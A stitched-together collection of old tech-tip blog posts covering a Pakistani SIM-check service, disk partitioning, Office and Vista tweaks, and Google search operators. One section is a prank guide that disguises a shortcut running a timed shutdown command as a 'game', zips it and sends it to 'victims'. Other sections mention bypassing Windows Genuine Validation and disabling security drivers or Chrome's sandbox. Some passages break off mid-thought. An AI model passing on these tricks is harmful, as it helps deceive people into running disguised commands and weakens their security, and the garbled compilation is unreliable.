Amid rampant grievances of consumers against telecommunication service providers, finally PTA has launched a new service which would enable a mobile users in Pakistan to know all SIM connections details issued against their names by just sending their CNIC number to 668 (The ID card number should be written without “-” and space). The sms will cost only Rs. 2.30.
This would help in detecting real identification of a SIM user. This new service is part of PTA efforts to block all illegal SIMs and clean the data of the mobile phone users.
To block all illegal SIMs issued on your ID card number, you should go to the nearest Customer Care Center of that particular telecom company with your Original ID card and its copy. They will check database with your ID card number and will verify your complaint. After that your have to fill up one simple form and will have to submit it with your ID card copy and within 2 days those SIMs would be blocked.
Chairman PTA Dr Mohammad Yaseen said that ‘PTA is cognizant of grievances of telecom consumers and taking number of steps to resolve their issues. In this regard the PTA has revamped complaint handling mechanism of mobile companies, those of the PTCL and other telecom operators’.
A subscriber can launch a complaint with its relevant operator and in case complaint is not resolved consumer can approach PTA Consumer Cell.

Ok this is a........ Well it's not really a virus of a hack because it doesn't damage anything. But that aside what it will do is shutdown the victim’s computer, this can be put in MSN convos so it is VERY fun to have, and it can also be put in emails and such like things.
1) Right click on desk top, and then go New, then Shortcut.
2) Then in the "type location of the item" you want to type: %windir%\system32\shutdown.exe -s -t 120 -c "This is a virus"
You can change "this is a virus" to anything you would like that’s just the message that will appear. The 120 you typed in can also be change at will, this is simply the amount of time they receive in till there computer will shutdown. Once the code has been entered as you have seen above click next.
My advice would be to rename it something like.... wicked game. Depends on the victim’s age and sex. But make sure you call it something good or the victim won't bother clicking on it. After you have given it a name click on finish. You should now have an icon on your desktop that is called "wicked game" or whatever name you gave it. It is also advised you change the icon to something different.
3) Change name and icon.
4) Now to send it to some one you need to make a compressed file. This can be done by right clicking on the desktop, New, Compressed file (zipped) Then another folder should appear on your desktop click on this and drag your shutdown virus into the zipped folder.
5) Once your shutdown virus is in your compressed folder rename it. Make sure to give it a similar name as to the file inside it like "Great Game.zip" Don’t forget to add the .zip at the end.
WARNING! Make sure when you rename the compressed folder to add .zip at the end it is very important.
Now feel free to send it to anyone you...... dislike greatly.
As a safe guard I will tell you how to stop the shutdown count down. Just encase you ever click it your self LOL Ok go to start, run, type cmd, then in cmd type: shutdown -a
This will allow you to bypass the Microsoft Genuine Validation thingythis method works better than many others i've tried before. forget the cracks and injectors etc... this is the BEST WAY:

Nobody wants to setup their hard drive as one giant data dump. Dividing your drive into multiple partitions makes multitasking easier. Keeping different types of data such as work documents, mp3s, video files, etc in a partition separate from the operating system can greatly increase your computer’s performance. And if you are planning on using multiple operating systems then you will absolutely need multiple partitions.
What Is Partitioning ?
A partition can be assumed as a container, like one drawer of a file cabinet. Each partition uses a file system to store and name data. Windows 98 used FAT32 which allowed greater maximum partition sizes and stored data more efficiently than the FAT16 file system of DOS and Windows 95. Windows NT introduced NTFS file system, which offers better data security and efficient memory handling. Windows 2000 and XP can read and write to both NTFS and FAT32 partitions.
Partitioning Your Hard Drive Using FDISK
Follow these simple steps after runnning FDISK command in command prompt to partition your harddrive:
First, to view a list of all drives available on your system select (5).
Press (4) to view partition information on the drive, then select the new hard drive.
Select (1) to create a partition, then on the next screen choose (1) to create a primary partition on that drive.
Select (y) if you wish to use all the space on the drive for this one partition(which we don’t want to), or (n) if you wish to make more than one partition on the drive now or later. If you selected (n), enter the amount of space you wish to use for the primary partition.
By selecting (n) it means that you do want to create multiple partitions, you must now make a secondary partition using the rest of the free space.
Press (1) to create another partition, then (2) to create an extended DOS partition. While it gives you an option to use less than full amount of space on the disk here but any space which is not allocated now can no longer be used by FDISK unless you erase the existing partitions. So accept the default (maximum available) size for the extended partition, then press ‘ESC.’ This will take you to the menu for creating logical drives in the extended partition.
To create a logical drive which are represented by drive C: or D: etc, simply fill in the amount of space you require the drive to have.
After you finished performing all this procedure, Exit from FDISK, reboot to windows.
Partitioning Your Hard Drive In Windows 2000/XP
To start partitioning in Windows 2000/Xp environment, right click My Computer and select Manage, once you enter into the Manage screen, from here select Disk Management.
This main screen will show you the existing drives with the new ones. At this instance Windows usually open up a wizard to help partition and format your new drive. If it does not, right click the new drive in the lower pane and select initialize drive.
Now you can partition your drive by following these steps.
Right click on the new drive and select new partition, then it will launch the partition wizard.
In this step it will then prompt you how much drive space you want to allocate to the new partition.
If you choose not to use the full amount of space for the first partition, you can create additional partitions in the same way up to a maximum of four partitions per disk.
Now it will ask for a drive letter which Windows will use to represent partition as C: or D: etc.
Once you’ve created the partitions, you’ll have to format the newly created partitions which Windows will prompt to do automatically.
Once formatting is complete, reboot your computer, and you’re done.
Hibernate is great because it saves the status of your Windows XP session (all the programs and documents you have open) to the hard drive, so it can automatically restore it the next time you power up. The first step to making a Hibernate shortcut is to make sure you have Hibernate turned on.
Go to the Control panel then click Performance and maintenance.
Next, choose Power options, and select the hibernate tab.
Finally, make sure Enable hibernation is checked.
Now to actually make the shortcut right click your desktop and choose New | Shortcut.
Next, type this case-sensitive command into the dialog box rundll32.exe PowrProf.dll, SetSuspendState click next.
Give the shortcut a name and click finish.
From now on all you need to do to enter hibernation is double click the shortcut.
When opening Microsoft Excel 2003 files in Microsoft Office Excel 2007 without having Excel 2007 already running you may find that files that a long time to open (20-60 seconds) while Excel 2007 or even Microsoft Office Word 2007, PowerPoint 2007 files take only a portion of that time to load.
The solution to this problem is easy and does not require any additional software other than the standard Microsoft Windows Explorer.
Open Windows Explorer (explorer.exe)
Select Tools | Folder Options from the menu
Go to the File Types tab.
Select list item XLS (Microsoft Office Excel 97-2003 Worksheet) and click on Advanced. If the “Appl ication used to perform action:” field the default value should be “C:Program FilesMicrosoft OfficeOffice12EXCEL.EXE” /e” . Change this to “C:Program FilesMicrosoft OfficeOffice12EXCEL.EXE” /e “%1″ . Remember to enclose the full excel.exe path and %1 in parenthesis. Since Windows 95 this is a way to escape spaces in file names; %1 will return the file name of that file that is being opened by double-clicking.You can uncheck “U se DDE” but Microsoft Office Excel 2007 will bring it back to what you see above when you next open it.
Just confirm (hit “OK” ) on all the Microsoft Windows Explorer dialogs and next time you open a Excel 2003 file in Excel 2007 without having it already running you won’t have to wait!
If the above listed steps don’t fix the problem, simply add the Lookup Wizard add-in in Excel. Some readers have reported that solved the problem for them! To install it click the Office Button, Excel Options, Add-Ins, and then click Manage Excel Add-ins | Go on the bottom of the window, select Lookup Wizard and click OK!
Here are some tips that might help you launch Microsoft Word more quickly if it feels slow. Not all will work, and this applies only to Microsoft Word 2007 for Windows. And I’m assuming you’ve already got plenty of RAM and hard disk space, defragement your files regularly and are using a computer fast enough to handle Word 2007.
Remove Unnecessary Add-ins
Click on the Office logo in the top left corner, click on Options at the bottom of the menu, and then Add-Ins towards the bottom of the list in the Word Options window.
Select COM Add-ins at the bottom drop down menu called Manage: and click on the Go… button.
Unselect as many of the Add-Ins in the list and click OK.
Prevent links from being updated
Back in the main Word Options window, click on Advanced.
Scroll down to the bottom and uncheck the Update automatic links at open box.
Click OK.
Change your Default Printer
Some folk have reported faster loading times if they select a different printer. It’s definitely worth trying.
Remove Antivirus Checking

Google chrome’s “application failed to initialize properly (0xc0000005)” error have some temporary fixes.Google chrome (chrome.exe) did not work for me initially, and I got the Google chrome error:
“The application failed to initialize properly (0xc0000005).Click on OK to terminate the application.”
I was disappointed and doing a search revealed that several people were reporting the same problem on various windows platforms including windows vista (SP1, ultimate), windows XP3 or windows XP2.So the error seem to have been triggered in different versions of windows vista and windows XP platforms and it is not specific to any one of them.Also, the bug was reportedly caused by “Symantec Endpoint Protection“, though in my case, I was not using any symantec product.
If you faced “The application failed to initialize properly (0xc0000005).Click on OK to terminate the application.” error with google chrome (chrome.exe) and you are using symantec, then you could try the following steps:
Back up the registry on an affected system
Open the registry on the Agent system by entering regedit from a run prompt
Navigate to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SysPlant
Open the Start DWORD
Change the value to 4 to disable the drivers
Reboot the system to commit the changes

The other easier solution is to run Google Chrome with --no-sandbox (with two dashes before “no”). To run it with the above option, edit the property of the shortcut you use to launch Google chrome and add the above option at the end of the “target” line (after the path to the chrome exe) i.e. Right click your shortcut to “Google Chrome” and click Properties. In the target text field, add a space then add --no-sandbox (with two dashes before “no”) right after the ending quotation mark. Run using this shortcut.However make sure that there is a space in between the ending quotation mark and the --no-sandbox option that you add.You could find a shortcut to google chrome on your desktop.Also note that you should use two dashes before “no”.See the pic. below.
You are in effect loosing the sandbox effect of Google Chrome.
What is sandboxing in Google chrome?
Sandboxing is a special feature in Google chrome, to prevent malware from installing itself onto computer/PC.It also prevents what happens in one tab from affecting the other tabs i.e each tab runs as a seperate process and for each of these processes, all the rights have been stripped.
Hence, each of these processes are isolated and the websites/web applications you run via these processes can compute but they cannot write files to your hard drive or read files from sensitive areas like your documents or desktop. From the above, it is clear that sandboxing has lots of goodness and one would not like to loose this feature of google chrome. However note that sandboxing is only an additional security feature in google.

In Windows Vista it is very easier to improve performance of the computer than previous version of Windows. It is just two step process

i. Rating Your Computer :
To Rate your computer means to check how is performing your computer. To do so Start Control Panel then click "Classic View" to switch Control Panel to Classic View then click "Performance Information and Tools" item.
A Window will be appeared on the screen and it shows about Windows Experience Index Base Score. Base score shows overall performance of your system including Memory (RAM), Processor (CPU),Primary Hard Disk, Graphics Performance and 3D Graphics capability (Gaming Graphics).If Higher the base score, Faster is your computer. Base score is determined by lowest subscore, subscore is rating of individual hardware component. The following picture shows about my pc's subscore and Base score. The above picture is showing that Processor has 3.5 subscore, RAM 3.9, Graphics 1.9, Gaming Graphics 1.0 ,Primary hard disk 4.3. 1.0 is lowest subscore of Gaming Graphics among them so the base score of my pc is 1.0, means lowest subscore is base score of the computer so now it has become easier to rate our computer and improve performance. Note : You can also get Base Score of your computer by Right clicking "Computer" option in Start menu. ii. Improving performance of the computer :
Once you have rated your computer now it is become more easier task to improve performance of your windows vista machine. If subscore of processor is low you need to upgrade processor of your computer, same way if RAM has low subscore means you need to install more RAM in your PC. If Graphics has low subscore means you need to purchase and install a Graphics card with 128 or 256 MB of RAM. If primary hard disk has low subscore means you need to have a faster hard disk in your PC. By this way you can improve subscore of individual hardware if subscore of individual hardware is high the Base Score of your computer will be high and it perform faster than before. Keep in mind one thing too. If base score of Gaming Graphics is low, so it is not neccessary to buy a new Graphics card and install into your machine, until you have such type of higher graphics work to do on the machine. If your computer's base score is already high however also it is performing slower, so the problem is not related to hardware but it may be related to some setting in OS. Follow the given below steps and improve performance of your Windows Vista.

startup programs are programs which are automatically started when Windows start and this process slow down Windows startup speed and it also takes memory. By disabling these startup program you can improve Windows vista's performance.
To disable startup program you have to start Windows Defender software. To do this click Start then All Programs then Windows Defender. Windows Defender gets start. then choose "Startup Programs" from the catagory drop down list box and then choose the application which you don't need start at startup and then click the "Disable" Button. By this way you can make disable all those application which you don't need to start at startup.
Note : if you run Windows Defender and get this window then click "Tools" then click "Software Explorer". You can't disable "Windows Defender", "Microsoft Userinit Logon Application", "Microsoft Windows Explorer" because these application requires to run windows. so no need to disable them.

Disk Cleanup is a utility program throgh which you can remove unnecessary files, temporary file and system files and other items that you no longer need. And by this way you can improve performance of your Windows Vista computer. To do so click "Start" then "Computer" then Right click "Local Disk C:" drive then click "Properties" from the popup menu. "Disk Properties" dialogue box will be appeared on the screen.
Now click "Disk Cleanup" button from the dialogue box. Now "Disk Cleanup options" window will be appeared on the screen. it will ask you to choose which files to cleanup, choose the desired option and then click. Then Disk cleanup will calculate that how much space you can free up on the drive. Then a window will be appeared on the screen there select the check boxes which files do you want to delete and then press "Ok" button. By this way you can cleanup all the drives on your computer for temporary files and improve the performance of Windows Vista. you can also start Disk Cleanup By clicking Start : All Programs : Acessories : System Tools : Disk Cleanup
3. By using Disk Defragmenter :
When you save files in computer, it saves randomly also when you update any files later it creates fragments. when you look for this files computer takes time to recollect it. To improve performance of the hard disk you need to defragment your hard drive time to time. You can shedule it or start it manually. To do so click Start : All Programs : Accessories : System Tools : Disk Defragmenter, Disk defragmenter window will be appeared on the screen. Now click "Defragment now" button to start difragmentation of your hard drive. it will take a few minutes to hours depend on the condition of the hard disk. Once defragmentation is complete it will improve the performance of Windows Vista.
4. Adjusting Windows Vista for Best Performance:
Step 1: Click Start>Control Panel.
Step 2: Then Click System and Maintenance > System > Advanced system settings. Windows Vista will ask for your permission to continue a dialogue box will be appeared on the screen. Click "Continue" button to go further. Step 3: "System Properties" dialogue box will appear on the screen. Click "Advanced" Tab and then click "Settings" button under performance option. Step 4: "Performance Option" Window will be appeared on the screen click "Adjust for the best performance" option button and then press "Ok" button to apply the setting and you are done. This above settings will disable all these features of Windows Vista.

After disabling all above features window will look like the following picture. You don’t like this look Click "Let windows choose what's best for my computer” from "Performance Option" window and then press "Ok" button but it will again slow down Windows Vista's Performance.
5. Windows ReadyBoost to improve performance of Windows Vista Computer :
Windows ReadyBoost can use storage space on removable media/devices suchas (USB universal serial bus) flash memory, memory card, memory stick, USB pen drive etc as a memory cache and boost up computer performance. Through this you can improve performance of Windows Vista machine without installing more memory.
Here are the step to achieve this.
Step 1: When you plug any flash memory into your PC an autoplay dialogue box will be appeared on the screen as shown in the picture.
OR Step 1: Right click "Remove Drive" and then choose "Properties" from drop down menu and then click "Ready boost" tab.
Step 2: Click "Speed up my system" option. "Removable disk Properties" window will be appeared on the screen to set the Windows Ready Boost settings.
Step 3: Click "Use this device" button to allow computer to use part of flash memory as a memory cache for your computer to inhance performace. Here also you have to mention, how much part of the flash memory do you want to reserve for the cache. In my case I have set 300 MB for this and then press "Ok" button. If you reserve 300 MB of flash memory for Windows Ready Boost then you can not use this space to store files.
In order use Windows Ready Boost your flash device must be of more than 256 MB.
If you don't have enough free space in your flash device then also you can not use it for Windows Ready Boost.
Step 4: Browse your flash memory, there you will find a filed called "Ready Boost" it is the file computer will use it as a memory cache.
Step 5: If you don't want to use this feature goto Removable disk properties and then click "Ready Boost" tab and then click "Do not use this device" option button. Then delete the Ready Boost file from flash memory. A confirmation window will be appeared on the screen. Press "Yes" button to delete the file. Note : To get better performance use one to three times of RAM (Random Access Memory) capacity. For example if you have 1 GB of RAM then you can use 1 GB to 3 GB of flash memory for better performance.
It is not neccessary that all flash memory works fine for this feature. There are two types of flash memory are available one is slow and another one is fast. This feature will work only with fast type of memory.

I’ve kept the descriptions of the search tips intentionally terse as you’re likely to grasp most of these simply by looking at the example from Google anyways.
12 Expert Google Search Tips
Explicit Phrase: Lets say you are looking for content about internet marketing. Instead of just typinginternet marketinginto the Google search box, you will likely be better off searching explicitly for the phrase. To do this, simply enclose the search phrase within double quotes.
Example: "internet marketing"
Exclude Words: Lets say you want to search for content about internet marketing, but you want to exclude any results that contain the termadvertising. To do this, simply use the "-" sign in front of the word you want to exclude.
Example Search: internet marketing -advertising
Site Specific Search: Often, you want to search a specific website for content that matches a certain phrase. Even if the site doesn’t support a built-in search feature, you can use Google to search the site for your term. Simply use the "site:somesite.com" modifier.
Similar Words and Synonyms: Let’s say you are want to include a word in your search, but want to include results that contain similar words or synonyms. To do this, use the "~" in front of the word.
Example: "internet marketing" ~professional
Specific Document Types: If you’re looking to find results that are of a specific type, you can use the modifier "filetype:". For example, you might want to find only PowerPoint presentations related to internet marketing.
Example: "internet marketing" filetype:ppt
This OR That: By default, when you do a search, Google will include all the terms specified in the search. If you are looking for any one of one or more terms to match, then you can use the OR operator. (Note: The OR has to be capitalized).
Example: internet marketing OR advertising
Phone Listing: Let’s say someone calls you on your mobile number and you don’t know how it is. If all you have is a phone number, you can look it up on Google using the phonebook feature.
Example: phonebook:617-555-1212 (note: the provided number does not work – you’ll have to use a real number to get any results).
Area Code Lookup: If all you need to do is to look-up the area code for a phone number, just enter the 3-digit area code and Google will tell you where it’s from.
Example: 617
Numeric Ranges: This is a rarely used, but highly useful tip. Let’s say you want to find results that contain any of a range of numbers. You can do this by using the X..Y modifier (in case this is hard to read, what’s between the X and Y are two periods. This type of search is useful for years (as shown below), prices or anywhere where you want to provide a series of numbers.
Example: president 1940..1950
Stock (Ticker Symbol): Just enter a valid ticker symbol as your search term and Google will give you the current financials and a quick thumb-nail chart for the stock.
Example: GOOG
Calculator: The next time you need to do a quick calculation, instead of bringing up the Calculator applet, you can just type your expression in to Google.
Example: 48512 * 1.02
Word Definitions: If you need to quickly look up the definition of a word or phrase, simply use the "define:" command.
Example: define:plethora
